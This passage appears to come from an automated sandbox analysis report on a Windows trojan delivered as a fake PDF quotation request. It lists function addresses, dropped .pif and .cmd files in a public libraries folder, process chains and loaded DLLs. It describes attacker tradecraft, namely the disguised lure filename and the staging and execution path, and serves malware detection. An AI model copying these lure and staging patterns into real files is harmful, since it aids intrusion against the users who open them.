                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004025B06_1_004025B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004028706_1_00402870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_00401D696_1_00401D69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_00401D706_1_00401D70
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028820C48_2_028820C4
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370A35212_2_2370A352
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365E3F012_2_2365E3F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237103E612_2_237103E6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236F027412_2_236F0274
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236D02C012_2_236D02C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236D815812_2_236D8158
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2364010012_2_23640100
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236EA11812_2_236EA118
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237081CC12_2_237081CC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237041A212_2_237041A2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237101AA12_2_237101AA
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236E200012_2_236E2000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365077012_2_23650770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2367475012_2_23674750
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2364C7C012_2_2364C7C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366C6E012_2_2366C6E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365053512_2_23650535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2371059112_2_23710591
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370244612_2_23702446
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236F442012_2_236F4420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236FE4F612_2_236FE4F6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370AB4012_2_2370AB40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23706BD712_2_23706BD7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2364EA8012_2_2364EA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366696212_2_23666962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236529A012_2_236529A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2371A9A612_2_2371A9A6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365284012_2_23652840
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365A84012_2_2365A840
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2367E8F012_2_2367E8F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236368B812_2_236368B8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236C4F4012_2_236C4F40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23692F2812_2_23692F28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23670F3012_2_23670F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236F2F3012_2_236F2F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365CFE012_2_2365CFE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23642FC812_2_23642FC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236CEFA012_2_236CEFA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23650E5912_2_23650E59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370EE2612_2_2370EE26
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370EEDB12_2_2370EEDB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370CE9312_2_2370CE93
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23662E9012_2_23662E90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365AD0012_2_2365AD00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236ECD1F12_2_236ECD1F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2364ADE012_2_2364ADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23668DBF12_2_23668DBF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23650C0012_2_23650C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23640CF212_2_23640CF2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236F0CB512_2_236F0CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2363D34C12_2_2363D34C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370132D12_2_2370132D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2369739A12_2_2369739A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236F12ED12_2_236F12ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366B2C012_2_2366B2C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236552A012_2_236552A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2368516C12_2_2368516C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2363F17212_2_2363F172
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2371B16B12_2_2371B16B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365B1B012_2_2365B1B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370F0E012_2_2370F0E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237070E912_2_237070E9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236FF0CC12_2_236FF0CC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236570C012_2_236570C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370F7B012_2_2370F7B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2369563012_2_23695630
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237016CC12_2_237016CC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370757112_2_23707571
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_237195C312_2_237195C3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236ED5B012_2_236ED5B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2364146012_2_23641460
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370F43F12_2_2370F43F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FB7612_2_2370FB76
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2368DBF912_2_2368DBF9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236C5BF012_2_236C5BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366FB8012_2_2366FB80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236C3A6C12_2_236C3A6C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23707A4612_2_23707A46
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FA4912_2_2370FA49
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236FDAC612_2_236FDAC6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236EDAAC12_2_236EDAAC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23695AA012_2_23695AA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236F1AA312_2_236F1AA3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2365995012_2_23659950
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366B95012_2_2366B950
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236E591012_2_236E5910
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236BD80012_2_236BD800
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236538E012_2_236538E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FF0912_2_2370FF09
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23613FD212_2_23613FD2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23613FD512_2_23613FD5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FFB112_2_2370FFB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23651F9212_2_23651F92
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23659EB012_2_23659EB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23707D7312_2_23707D73
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23653D4012_2_23653D40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23701D5A12_2_23701D5A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2366FDC012_2_2366FDC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236C9C3212_2_236C9C32
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_2370FCF212_2_2370FCF2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040156012_1_00401560
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040205812_1_00402058
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_004025B012_1_004025B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040287012_1_00402870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_004010E012_1_004010E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040323012_1_00403230
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_004012C012_1_004012C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040335012_1_00403350
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_0040155312_1_00401553
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_00401D6912_1_00401D69
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_1_00401D7012_1_00401D70
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\kmtqwssC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: String function: 029544AC appears 73 times
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: String function: 0295480C appears 931 times
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: String function: 029546A4 appears 244 times
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: String function: 02968824 appears 45 times
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: String function: 029687A0 appears 54 times
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: String function: 029544D0 appears 32 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 23685130 appears 58 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 236CF290 appears 103 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 2CE27E54 appears 102 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 2CE4EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 236BEA12 appears 82 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 2CE15130 appears 58 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 2CE5F290 appears 105 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 2363B970 appears 280 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 23697E54 appears 111 times
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: String function: 2CDCB970 appears 278 times
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: String function: 028846A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: String function: 028987A0 appears 48 times
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: String function: 0288480C appears 619 times
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.00000000216C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.0000000021696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@21/7@2/2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02957F5C GetDiskFreeSpaceA,1_2_02957F5C
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02966D50 CoCreateInstance,1_2_02966D50
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile created: C:\Users\Public\CsswqtmkF.cmdJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeFile read: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe"
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Csswqtmk.PIF "C:\Users\Public\Libraries\Csswqtmk.PIF"
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Csswqtmk.PIF "C:\Users\Public\Libraries\Csswqtmk.PIF"
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pif
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFProcess created: C:\Users\Public\Libraries\kmtqwssC.pif C:\Users\Public\Libraries\kmtqwssC.pifJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ncryptsslp.dllJump to behavior
